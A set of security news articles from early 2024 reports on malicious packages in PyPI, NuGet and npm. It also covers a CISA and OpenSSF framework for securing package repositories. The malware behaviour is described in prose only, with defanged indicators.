Mar 29, 2024NewsroomSupply Chain Attack / Threat Intelligence

The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign.

It said “new project creation and new user registration” was temporarily halted to mitigate what it said was a “malware upload campaign.” The incident was resolved 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.

Software supply chain security firm Checkmarx said the unidentified threat actors behind flooding the repository targeted developers with typosquatted versions of popular packages.

“This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials,” researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. “In addition, the malicious payload employed a persistence mechanism to survive reboots.”

The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as Pytorch, Matplotlib, and Selenium.

The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.

Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.

These deceptive variants – totalling over 500 packages, per Check Point – have been found to be uploaded from a unique account starting March 26, 2024, suggesting that the whole process was automated.

“The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries,” the Israeli cybersecurity company said.

Cybersecurity firm Phylum, which has also been tracking the same campaign, said the attackers published –

• 67 variations of requirements
• 38 variations of Matplotlib
• 36 variations of requests
• 35 variations of colorama
• 29 variations of tensorflow
• 28 variations of selenium
• 26 variations of BeautifulSoup
• 26 variations of PyTorch
• 20 variations of pillow
• 15 variations of asyncio

The packages, for their part, check if the installer’s operating system was Windows, and if so, proceed to download and execute an obfuscated payload retrieved from an actor-controlled domain (“funcaptcha[.]ru”).

The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script (“hvnc.py”) to the Windows Startup folder for persistence.

The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component to ensure that it safeguards against potential threats.

This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the “volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion.”

PyPI suspended new user registrations a second-time last year on December 27 for similar reasons. It was subsequently lifted on January 2, 2024.

Mar 26, 2024NewsroomIndustrial Espionage / Threat Intelligence

Threat hunters have identified a suspicious package in the NuGet package manager that’s likely designed to target developers working with tools made by a Chinese firm that specializes in industrial- and digital equipment manufacturing.

The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded 2,999 times as of writing.

The software supply chain security firm said it did not find any other package that exhibited similar behavior.

It, however, theorized the campaign could likely be used for orchestrating industrial espionage on systems equipped with cameras, machine vision, and robotic arms.

The indication that SqzrFramework480 is seemingly tied to a Chinese firm named Bozhon Precision Industry Technology Co., Ltd. comes from the use of a version of the company’s logo for the package’s icon. It was uploaded by a Nuget user account called “zhaoyushun1999.”

Present within the library is a DLL file “SqzrFramework480.dll” that comes with features to take screenshots, ping a remote IP address after every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address.

“None of those behaviors are resolutely malicious. However, when taken together, they raise alarms,” security researcher Petar Kirhmajer said. “The ping serves as a heartbeat check to see if the exfiltration server is alive.”

The malicious use of sockets for data communication and exfiltration has been observed in the wild previously, as in the case of the npm package nodejs_net_server.

The exact motive behind the package is unclear as yet, although it’s a known fact that adversaries are steadily resorting to concealing nefarious code in seemingly benign software to compromise victims.

An alternate, innocuous explanation could be that the package was leaked by a developer or a third party that works with the company.

“They may also explain seemingly malicious continuous screen capture behavior: it could simply be a way for a developer to stream images from the camera on the main monitor to a worker station,” Kirhmajer said.

The ambiguity surrounding the package aside, the findings underscore the complicated nature of supply chain threats, making it imperative that users scrutinize libraries prior to downloading them.

“Open-source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines,” Kirhmajer said.

Feb 23, 2024NewsroomSupply Chain Attack / Malware

A dormant package available on the Python Package Index (PyPI) repository was updated nearly after two years to propagate an information stealer malware called Nova Sentinel.

The package, named django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which detected an anomalous update to the library on February 21, 2024.

While the linked GitHub repository hasn’t been updated since April 10, 2022, the introduction of a malicious update suggests a likely compromise of the PyPI account belonging to the developer.

Django-log-tracker has been downloaded 3,866 times to date, with the rogue version (1.0.4) downloaded 107 times on the date it was published. The package is no longer available for download from PyPI.

“In the malicious update, the attacker stripped the package of most of its original content, leaving only an __init__.py and example.py file behind,” the company said.

The changes, simple and self-explanatory, involve fetching an executable named “Updater_1.4.4_x64.exe” from a remote server (“45.88.180[.]54”), followed by launching it using the Python os.startfile() function.

The binary, for its part, comes embedded with Nova Sentinel, a stealer malware that was first documented by Sekoia in November 2023 as being distributed in the form of fake Electron apps on bogus sites offering video game downloads.

“What’s interesting about this particular case […] is that the attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account,” Phylum said.

“If this had been a really popular package, any project with this package listed as a dependency without a version specified or a flexible version specified in their dependency file would have pulled the latest, malicious version of this package.”

Feb 12, 2024The Hacker NewsInfrastructure Security / Software Supply Chain

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced that it’s partnering with the Open Source Security Foundation (OpenSSF) Securing Software Repositories Working Group to publish a new framework to secure package repositories.

Called the Principles for Package Repository Security, the framework aims to establish a set of foundational rules for package managers and further harden open-source software ecosystems.

“Package repositories are at a critical point in the open-source ecosystem to help prevent or mitigate such attacks,” OpenSSF said.

“Even simple actions like having a documented account recovery policy can lead to robust security improvements. At the same time, capabilities must be balanced with resource constraints of package repositories, many of which are operated by non-profit organizations.”

Notably, the principles lay out four security maturity levels for package repositories across four categories of authentication, authorization, general capabilities, and command-line interface (CLI) tooling –

• Level 0 – Having very little security maturity.
• Level 1 – Having basic security maturity, such as multi-factor authentication (MFA) and allowing security researchers to report vulnerabilities
• Level 2 – Having moderate security, which includes actions like requiring MFA for critical packages and warning users of known security vulnerabilities
• Level 3 – Having advanced security, which requires MFA for all maintainers and supports build provenance for packages

All package management ecosystems should be working towards at least Level 1, the framework authors Jack Cable and Zach Steindler note.

The ultimate objective is to allow package repositories to self-assess their security maturity and formulate a plan to bolster their guardrails over time in the form of security improvements.

“Security threats change over time, as do the security capabilities that address those threats,” OpenSSF said. “Our goal is to help package repositories more quickly deliver the security capabilities that best help strengthen the security of their ecosystems.”

The development comes as the U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) warned of security risks arising as a result of using open-source software for maintaining patient records, inventory management, prescriptions, and billing.

“While open-source software is the bedrock of modern software development, it is also often the weakest link in the software supply chain,” it said in a threat brief published in December 2023.

Jan 19, 2024NewsroomSoftware Security / Spyware

A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines.

The package, named “oscompatible,” was published on January 9, 2024, attracting a total of 380 downloads before it was taken down.

oscompatible included a “few strange binaries,” according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file.

This JavaScript file (“index.js”) executes an “autorun.bat” batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows.

If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on “Windows Server OS.”

The batch script, for its part, verifies if it has admin privileges, and if not, runs a legitimate Microsoft Edge component called “cookie_exporter.exe” via a PowerShell command.

Attempting to run the binary will trigger a User Account Control (UAC) prompt asking the target to execute it with administrator credentials.

In doing so, the threat actor carries out the next stage of the attack by running the DLL (“msedge.dll”) by taking advantage of a technique called DLL search order hijacking.

The trojanized version of the library is designed to decrypt the DAT file (“msedge.dat”) and launch another DLL called “msedgedat.dll,” which, in turn, establishes connections with an actor-controlled domain named “kdark1[.]com” to retrieve a ZIP archive.

The ZIP file comes fitted with the AnyDesk remote desktop software as well as a remote access trojan (“verify.dll”) that’s capable of fetching instructions from a command-and-control (C2) server via WebSockets and gathering sensitive information from the host.

It also “installs Chrome extensions to Secure Preferences, configures AnyDesk, hides the screen, and disables shutting down Windows, [and] captures keyboard and mouse events,” Phylum said.

While “oscompatible” appears to be the only npm module employed as part of the campaign, the development is once again a sign that threat actors are increasingly targeting open-source software (OSS) ecosystems for supply chain attacks.

“From the binary side, the process of decrypting data, using a revoked certificate for signing, pulling other files from remote sources, and attempting to disguise itself as a standard Windows update process all along the way is relatively sophisticated compared to what we normally see in OSS ecosystems,” the company said.

The disclosure comes as cloud security firm Aqua revealed that 21.2% of the top 50,000 most downloaded npm packages are deprecated, exposing users to security risks. In other words, the deprecated packages are downloaded an estimated 2.1 billion times weekly.

This includes archived and deleted GitHub repositories associated with the packages as well as those that are maintained without a visible repository, commit history, and issue tracking.

“This situation becomes critical when maintainers, instead of addressing security flaws with patches or CVE assignments, opt to deprecate affected packages,” security researchers Ilay Goldman and Yakir Kadkoda said.

“What makes this particularly concerning is that, at times, these maintainers do not officially mark the package as deprecated on npm, leaving a security gap for users who may remain unaware of potential threats.”